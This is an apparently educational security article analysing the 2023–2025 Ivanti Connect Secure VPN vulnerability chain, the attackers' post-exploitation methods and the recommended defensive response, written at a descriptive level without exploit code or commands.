Ivanti Connect Secure Serial Vulnerabilities
Analysis of sustained exploitation campaigns targeting Ivanti Connect Secure VPN appliances.
Continue your mission
Analysis of sustained exploitation campaigns targeting Ivanti Connect Secure VPN appliances.
# Ivanti Connect Secure Serial Vulnerabilities
Ivanti Connect Secure (formerly Pulse Secure) VPN appliances occupy a privileged network position: they sit at the perimeter, authenticate remote users, and broker access to internal infrastructure. That concentration of trust makes them a high-value target. Between late 2023 and early 2025, a series of critical vulnerabilities in Ivanti Connect Secure created sequential exploitation opportunities that nation-state actors and criminal groups exploited faster than most organizations could patch. The result was one of the most sustained, widespread VPN compromise campaigns in recent memory, affecting government agencies, defense contractors, financial institutions, and critical infrastructure operators across dozens of countries. Understanding the vulnerability chain, the attacker techniques, and the required response is essential for any security program that depends on perimeter VPN for remote access.
---
The "Ivanti Connect Secure serial vulnerabilities" refers to a sequence of distinct but related security flaws discovered in Ivanti Connect Secure and, in some cases, Ivanti Policy Secure appliances between 2023 and 2025. The term "serial" is deliberate: these were not a single flaw disclosed once. They were successive vulnerabilities in the same product family, each enabling unauthenticated remote code execution (RCE) or equivalent impact, and each arriving in close enough sequence that organizations patching one flaw often remained exposed to the next before remediation was complete.
The four primary CVEs in this chain are: CVE-2023-46805 (authentication bypass, CVSS 8.2), CVE-2024-21887 (command injection, CVSS 9.1), CVE-2024-21893 (server-side request forgery bypass, CVSS 8.2), and CVE-2025-0282 (stack-based buffer overflow, CVSS 9.0). When chained, the first two allowed a remote, unauthenticated attacker to execute arbitrary commands on the appliance. The third bypassed mitigations introduced in the initial patch. The fourth opened a new exploitation vector for devices that had applied prior patches.
This topic is distinct from general VPN security weaknesses or misconfiguration issues. It is also distinct from the Pulse Connect Secure vulnerabilities disclosed in 2021 (CVE-2021-22893), though those share architectural lineage. The 2023 to 2025 chain is notable specifically because: the vulnerabilities arrived faster than the vendor's patch cadence; the Integrity Checker Tool (ICT) embedded in the appliance was itself subverted by threat actors; and factory resets were ultimately required rather than incremental patching.
This is not a problem of weak passwords, misconfigured access controls, or missing MFA. It is a problem of exploitable flaws in the appliance's core authentication and request-handling logic that no customer-side configuration change could prevent.
---
Authentication Bypass and Command Injection (CVE-2023-46805 and CVE-2024-21887)
The first exploitation vector combined two separate flaws into a single, powerful attack chain. CVE-2023-46805 allowed an unauthenticated attacker to bypass the web component's authentication checks by manipulating specific URI paths in the Connect Secure web interface. Certain paths were not consistently validated against the authentication middleware, meaning an attacker could reach protected endpoints without presenting valid credentials.
CVE-2024-21887 was a command injection vulnerability in the same web interface. When authenticated (or, after chaining with the auth bypass, effectively unauthenticated), an attacker could send crafted HTTP requests to administrative endpoints and inject operating system commands that would execute in the context of the appliance's underlying system. Together, these two CVEs gave a remote attacker unauthenticated RCE on any internet-facing Connect Secure appliance.
Exploitation was not theoretical. By January 10, 2024, Volexity and Mandiant had documented active mass exploitation, with threat actor UNC5221 deploying webshells and credential-harvesting implants across targets in the United States, Japan, and Europe. Attacks began as early as December 2023, before public disclosure, indicating prior access to vulnerability information through either independent research or intelligence acquisition.
Server-Side Request Forgery Bypass (CVE-2024-21893)
When Ivanti released patches addressing the first two CVEs, UNC5325 (assessed as a Chinese state-sponsored actor) adapted. CVE-2024-21893 was a server-side request forgery (SSRF) vulnerability in the SAML component of Connect Secure. An attacker could craft requests that caused the appliance to make server-side HTTP requests to internal or restricted resources, effectively bypassing the authentication controls that the initial patch had strengthened. This meant that organizations that applied the January 2024 patch remained vulnerable to a second exploitation path via the SAML component. Mass exploitation of this second CVE began shortly after its February 2024 disclosure, before many organizations could apply the updated patch.
Stack Buffer Overflow (CVE-2025-0282)
The third major wave involved CVE-2025-0282, a stack-based buffer overflow in the same product line. This vulnerability allowed an unauthenticated remote attacker to achieve code execution by sending a maliciously crafted request that overflowed a stack buffer in the appliance's web service process. This vulnerability was exploited in the wild before Ivanti disclosed it in January 2025, again indicating pre-patch exploitation by well-resourced actors. The Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive requiring federal civilian agencies to disconnect affected appliances and conduct full compromise assessments before reconnecting.
Post-Exploitation Mechanics
Once attackers achieved RCE, the post-exploitation pattern was consistent across documented intrusions. Attackers deployed webshells (BUSHWALK, LIGHTWIRE, and WIREFIRE were the primary families identified by Mandiant) into writable directories on the appliance. These webshells persisted across reboots and survived the standard in-place patch process because they were written to portions of the file system not overwritten by the patch installer.
Attackers then modified legitimate Ivanti components to establish deeper persistence. In several documented cases, attackers tampered with the ICT so that it would report a clean state even when the appliance was compromised. This is a critical detail: organizations that ran the vendor-supplied ICT after applying patches received false assurance. Only the external, independent ICT released later by Ivanti, or forensic disk imaging, could detect the modifications.
From the compromised VPN appliance, attackers conducted credential harvesting (capturing credentials submitted by legitimate users), internal network pivoting through the appliance's privileged network position, and lateral movement into Active Directory and downstream systems.
Attack Timeline and TTPs
The sophistication of the exploitation campaign extended beyond the vulnerabilities themselves. Threat actors demonstrated detailed operational security: they rotated command-and-control infrastructure frequently, used legitimate cloud services for data staging, and deployed different webshell families to complicate attribution and detection. UNC5221 specifically targeted government and defense contractors, while Magnet Goblin focused on commercial targets for ransomware deployment.
The timing of exploitation relative to disclosure reveals pre-positioned access to vulnerability information. CVE-2023-46805 and CVE-2024-21887 were actively exploited in December 2023, but not publicly disclosed until January 2024. This pattern repeated with subsequent vulnerabilities: exploitation began before or within hours of public disclosure, compressed the window for defensive response to essentially zero.
Scenario: Defense Contractor Compromise
A defense contractor running Ivanti Connect Secure for remote access had applied the initial January 2024 patches within the vendor's recommended window. Their ICT scan reported no indicators of compromise. However, the contractor had been compromised before the patch was applied. The webshells survived patching. Over the following six weeks, the threat actor used the appliance's network position to enumerate internal hosts, extract Active Directory credentials, and access a file server containing sensitive program documentation. The compromise was not detected until a third-party threat intelligence provider flagged outbound connections to a known UNC5221 command-and-control infrastructure.
---
VPN appliances are among the most trusted devices on any network. They sit between the public internet and internal infrastructure, they process authentication credentials for every remote user, and they typically have broad network access to support diverse remote use cases. A compromised VPN appliance is not a compromised endpoint: it is a compromised network gateway with visibility into all traffic passing through it.
The Ivanti Connect Secure campaign produced documented consequences across multiple sectors. CISA confirmed that multiple U.S. federal civilian agencies were compromised. The New Zealand National Cyber Security Centre, the UK National Cyber Security Centre, and German federal authorities all issued advisories confirming incidents in their jurisdictions. Mandiant estimated that hundreds of organizations globally were affected in the initial January 2024 exploitation wave alone.
The business impact extended beyond immediate incident response costs. Organizations faced several weeks of VPN outage while conducting factory resets and full compromise assessments. For organizations where VPN was the primary remote access mechanism, this represented significant operational disruption. Some organizations discovered that the compromise had persisted for weeks or months before detection, requiring extensive forensic investigation to determine the scope of data exposure.
The financial impact was amplified by the timing of disclosure in January, when many organizations were managing increased remote work demands and reduced IT staffing during the holiday period. Emergency response costs, external forensic support, and business continuity measures drove incident response costs into the hundreds of thousands of dollars per affected organization. Government agencies faced additional compliance implications under federal incident reporting requirements.
A common misconception in the initial response was that applying the vendor patch was sufficient. Many security teams, following standard patch management procedures, applied the patch, ran the ICT, received a clean result, and considered the issue resolved. This was incorrect for organizations that had been compromised before patching. The ICT tampering by threat actors specifically targeted this assumption. The correct response, which CISA and Ivanti eventually made explicit, was factory reset followed by an independent compromise assessment, regardless of ICT results.
A second misconception was that the vulnerabilities primarily affected government targets. Magnet Goblin, a financially motivated threat actor, was documented exploiting the same vulnerability chain against commercial targets for ransomware deployment and financial fraud. The attack surface was any internet-facing Ivanti Connect Secure appliance, regardless of the owner's sector.
---
CDA approaches the Ivanti Connect Secure serial vulnerabilities through two primary domains of the Planetary Defense Model: Threat Intelligence and Detection (TID) and Vulnerability and Surface Defense (VSD). The governing methodology is Predictive Defense Intelligence (PDI): see the threat before it sees you.
The practical application of PDI to this threat class begins with the recognition that serial vulnerabilities in internet-facing appliances follow a pattern. When a critical vulnerability is disclosed in a widely deployed perimeter device, exploitation by sophisticated actors typically begins within 24 to 72 hours. In the Ivanti case, exploitation began before public disclosure, meaning that organizations relying on patch release as their detection trigger had already lost the race. PDI requires moving the detection point earlier: monitoring threat intelligence feeds, vendor security advisories, and government early-warning channels to identify exploitation activity before CVEs are publicly assigned.
CDA's TID methodology applies continuous monitoring of internet-facing appliance telemetry as a first-order priority, not a secondary consideration. For Ivanti Connect Secure specifically, this means: collecting and analyzing appliance web server logs for anomalous URI patterns consistent with auth bypass attempts; monitoring for unexpected outbound connections from the appliance; and maintaining baselines of legitimate file system state against which to compare periodic integrity snapshots. The compromise of the built-in ICT in this campaign is a direct example of why CDA does not rely on vendor-supplied integrity verification alone. Independent verification from a separate, non-appliance-resident tool is a standard PDI control.
On the VSD side, CDA treats internet-facing VPN appliances as high-priority attack surface requiring dedicated monitoring and a pre-defined response playbook. The Ivanti campaign reinforced the CDA recommendation to evaluate Zero Trust Network Access (ZTNA) architectures as a structural alternative to traditional VPN, not because VPN is inherently broken, but because ZTNA architectures distribute trust rather than concentrating it in a single appliance. A compromised ZTNA broker does not provide the same lateral movement potential as a compromised traditional VPN gateway.
CDA also emphasizes that incident response planning for internet-facing appliances must include factory reset and full internal compromise assessment as explicit scenarios, with pre-approved authorization chains to minimize delay when the scenario activates.
---
---
---
CDA Theater missions that address topics covered in this article.
Lazarus Group is North Korea's primary advanced persistent threat operation, operating under the RGB (Reconnaissance General Bureau), the DPRK's primary foreign intelligence service.
Salt Typhoon is a Chinese state-sponsored advanced persistent threat (APT) group that conducts signals intelligence collection operations against telecommunications infrastructure.
Evidence collection, chain of custody, forensic imaging, and analysis techniques for incident investigations.
Written by CDA Editorial
Found an issue? Help improve this article.